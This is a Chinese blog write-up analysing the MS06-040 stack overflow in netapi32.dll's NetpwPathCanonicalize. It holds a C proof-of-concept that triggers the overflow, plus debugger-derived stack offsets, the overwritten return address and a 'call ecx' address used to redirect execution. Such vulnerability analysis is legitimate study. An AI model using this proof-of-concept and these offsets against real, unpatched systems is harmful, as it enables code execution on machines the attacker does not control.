经典栈溢出之MS060-040漏洞分析

最新推荐文章于 2024-07-05 17:12:31 发布
最新推荐文章于 2024-07-05 17:12:31 发布
阅读量637 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qiye_/article/details/80544335
版权

  找了好久才找到Win 2000 NetApi32.dll样本,下面我对这个经典栈溢出进行一下分析,使用IDA打开NetApi32.dll,问题函数:NetpwPathCanonucalize。实验环境:win xp sp3,ollydbg,IDA。exp编译工具:VC++ 6.0

其中的子函数存在溢出:

汇编代码注释:

两个溢出点,但是第一个无法利用:

 

找到一个网上的POC:

int main()
{
     char Str[0x320];
	 char lpWideCharStr[0x440];
	 int  arg_8 = 0x440;
	 char Source[0x100];
	 long arg_10 = 44;
	 HINSTANCE LibHandle;
	 MYPROC Func;
	 char DllName[] = "./netapi32.dll";

	 LibHandle = LoadLibrary(DllName);
	 if( LibHandle == NULL)
	 {
		  MessageBox(0, "Can't Load DLL!", "Warning", 0);
		  FreeLibrary(LibHandle);
	 }
	 Func = (MYPROC)GetProcAddress(LibHandle, "NetpwPathCanonicalize");
	 if ( Func == NULL )
	 {
		  MessageBox(0, "Can't Load Function Address!", "Warning", 0);
		  FreeLibrary(LibHandle);
	 }
	 memset(Source, 0, sizeof(Source));
	 memset(Source, 'b', sizeof(Source)-2);
	 memset(Str, 0, sizeof(Str));
	 memset(Str, 'a', sizeof(Str)-2);
	 (Func)(Str, lpWideCharStr, arg_8, Source, &arg_10, 0);
	 FreeLibrary(LibHandle);
     return 0;
}

动态调试:找到函数返回地址被覆盖的位置。

 

 

 

 

不仅找到了覆盖的返回地址,同时发现ecx指向栈顶

寻找call ecx硬编码FFD1

根据搜集到的信息:

栈空间的起始地址为0012F258

0x0012F258 bbbbbbbbb

0x0012F348 bbbbbbbbbbbbbb

0x0012F358 aaaaaaaaaaaaa

0x0012F670 \xc2\x7b\x19\x75

0x0012F674 aa

0x0012F66C ebp

0x0012F670 返回地址

call ecx 0x75197bc2

根据POC编写exp,测试:

 

qiye_
关注
MS07-014漏洞分析.doc
09-24
### MS07-014 漏洞分析 #### 漏洞概述 MS07-014 是一个针对Microsoft Office多个版本的安全漏洞,包括Office 2000、2002和2003等。该漏洞允许攻击者通过恶意构造的文档来执行任意代码,从而获取与当前用户相同的...
深入浅出MS06-040
08-23 4159
 入浅出MS06-040时至今日,网上已有颇多MS06-040的文章,其中不乏精辟之作。与其相比,本文突显业余,技术上无法超越,徒逞口舌之快。本文适合有一定计算机基础,初步了解溢出攻击原理,稍微了解逆向技术的朋友阅读。如果您根据本文的指导亲手完成了全部的7节实验内容,相信您对栈溢出的掌握和漏洞利用的认识一定会到一个更高的level。实验中涉及的所有细节均可重现,使用的源代码都已经过详细的注
Java中的内存泄露、内存溢出与栈溢出
欧阳方超的专栏
05-01 1742
内存泄漏、内存溢出和栈溢出都是程序中常见的内存问题,它们都会导致程序运行的异常和不稳定。为了避免这些问题,我们需要在编程中注意及时释放不再使用的资源和对象引用,避免内存分配过多,优化算法和代码结构等。
网络安全常见十大漏洞总结(原理、危害、防御)_网络安全常见漏洞类型_漏洞基本原理
最新发布
baimao__Ch的博客
07-05 3126
接下来我将给各位同学划分一张学习计划表!e题外话初入计算机行业的人或者大学计算机相关专业毕业生,很多因缺少实战经验,就业处处碰壁。下面我们来看两组数据:2023届全国高校毕业生预计达到1158万人,就业形势严峻;国家网络安全宣传周公布的数据显示,到2027年我国网络安全人员缺口将达327万。一方面是每年应届毕业生就业形势严峻,一方面是网络安全人才百万缺口。6月9日,麦可思研究2023年版就业蓝皮书(包括《2023年中国本科生就业报告》《2023年中国高职生就业报告》)正式发布。
栈溢出漏洞
Civit_的博客
03-27 247
CPU在执行call指令时,会先将当前call指令的下一条指令的地址入栈,再跳转到被调用函数。编译器会始终保证即使子函数使用了栈并修改了栈顶的位置,也会在函数返回前将栈顶恢复到刚进入函数时候的状态,从而保证取到的返回地址不会出错。Canary保护机制是,通过在栈保存rbp的位置前插入一段随机数,这样如果攻击者利用栈溢出漏洞覆盖返回地址,也会把Canary一起覆盖。​ 栈(stack)是一种简单且经典的数据结构,最主要的特点是使用先进后出(FILO)的方式存取栈中的数据。栈溢出是缓冲区溢出的一种。
Windows内存漏洞——栈溢出漏洞及其利用分析
theglasssky的博客
05-25 828
windows系统中内存漏洞中关于栈溢出的部分
MS09-001漏洞利用程序-GUI
02-19
漏洞的根源在于Server服务中的一个栈溢出错误,当系统处理特制的SMB(Server Message Block)请求时,攻击者可以利用此漏洞在目标系统上执行任意代码。 GUI版本的漏洞利用程序通常包含以下功能: 1. 输入参数:...
MS08-067漏洞攻击全程演示(图解).
04-28
在特定条件下,攻击者可以通过构造恶意的RPC请求,触发栈溢出,导致系统内存中的指令指针被覆盖,从而执行攻击者指定的代码。 攻击过程: 1. 攻击者发送一个特制的RPC请求到目标系统,这个请求包含过长的数据包,...
ms16-032本地溢出漏洞
06-27
2. **栈溢出**:ms16-032可能涉及到栈溢出,这是最常见的内存溢出类型之一。栈是程序运行时用于存储局部变量和函数调用信息的数据结构。当栈上的数据写入超过了分配的空间,就会覆盖栈上的其他数据,包括返回地址,...
ms15-034漏洞监测脚本
05-09
可以通过使服务器蓝屏崩溃监测服务器是否存在漏洞,以便修改加固。
ms漏洞溢出dos命令
06-15
有 ms04011 ms05039 ms05051 ms06040 ms08067 这五种,都是学习网络攻防使用的,所以分享给大家
MS06040漏洞扫描工具
06-17
MS06040漏洞扫描工具,若无法运行,尝试用windows2000兼容性运行。
从零开始学习软件漏洞挖掘系列教程
09-23
从零开始学习软件漏洞挖掘系列教程
aix for sqlserver_Openssh、Oracle、SQLServer系统漏洞修复
weixin_39713763的博客
12-21 645
系统服务器常见漏洞修复系统服务器漏洞,多出现于安装在服务器上的数据库或中间件上,如Oracle、SQLServer、MySQL、Apache、Tomcat、OpenSSH等。漏洞发布出来,各系统管理员多因没有即时安装漏洞补丁包或版本升级包,从而被漏洞扫描具发现存在漏洞。选取了一些工作中所遇到漏洞为例,说明漏洞补丁下载和修复。一、Windows操作系统常见漏洞1、MicrosoftWindows远程...
经典栈溢出漏洞分析
09-27 549
c源码如下: #include<stdio.h> #include<string.h> int main(int argc,char* argv[]){ char buf[256]; strcpy(buf,argv[1]); printf("Input:%s\n",buf); return 0; } 系统是Ubuntu20.04,使用gdb-peda调试。 1.相关知识 首先,我们解释 首先,有个预备知识,c程序是通过__libc_start_mai..
Web渗透测试之SRC挖掘经验分享
03-30
专注培养高薪网络安全人才,帮助大家了解并学习网络安全,传授黑白帽实战技能,带领零基础小白正式踏入入门阶段。把所有漏洞作为总结讲解,从理论到实战的分享,所有经验。结合漏洞挖掘的经验以及安全工作相关的经验总结漏洞原理、发现、利用,修复,姿势,防御,等多方面思路。实战方面结合以往挖掘SRC经验,把如何操作的各种方法和经验,以及挖过的漏洞,全部分享。具备web渗透测试工程师的工作水平; 能够挖掘各家SRC应急响应中心漏洞,凭借挖漏洞月收入过万
微软发布4个严重级别漏洞 应尽快升级
cuizui7685的博客
07-21 465
微软近日发布了今年七月的安全公告,4个补丁均为“严重”级别。受影响的产品是Windows域名服务、Windows vista系统中的Windows Explorer、Outlook Web Access和Micros...
复现经典漏洞:MS08-067分析与影响
本文主要介绍了Windows系统中的一个经典漏洞——MS08-067,以及如何复现这一漏洞,适合初学者学习和研究。漏洞MS08-067是由于Windows Server服务处理远程过程调用(RPC)请求时存在的缓冲区溢出问题,影响了多个...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值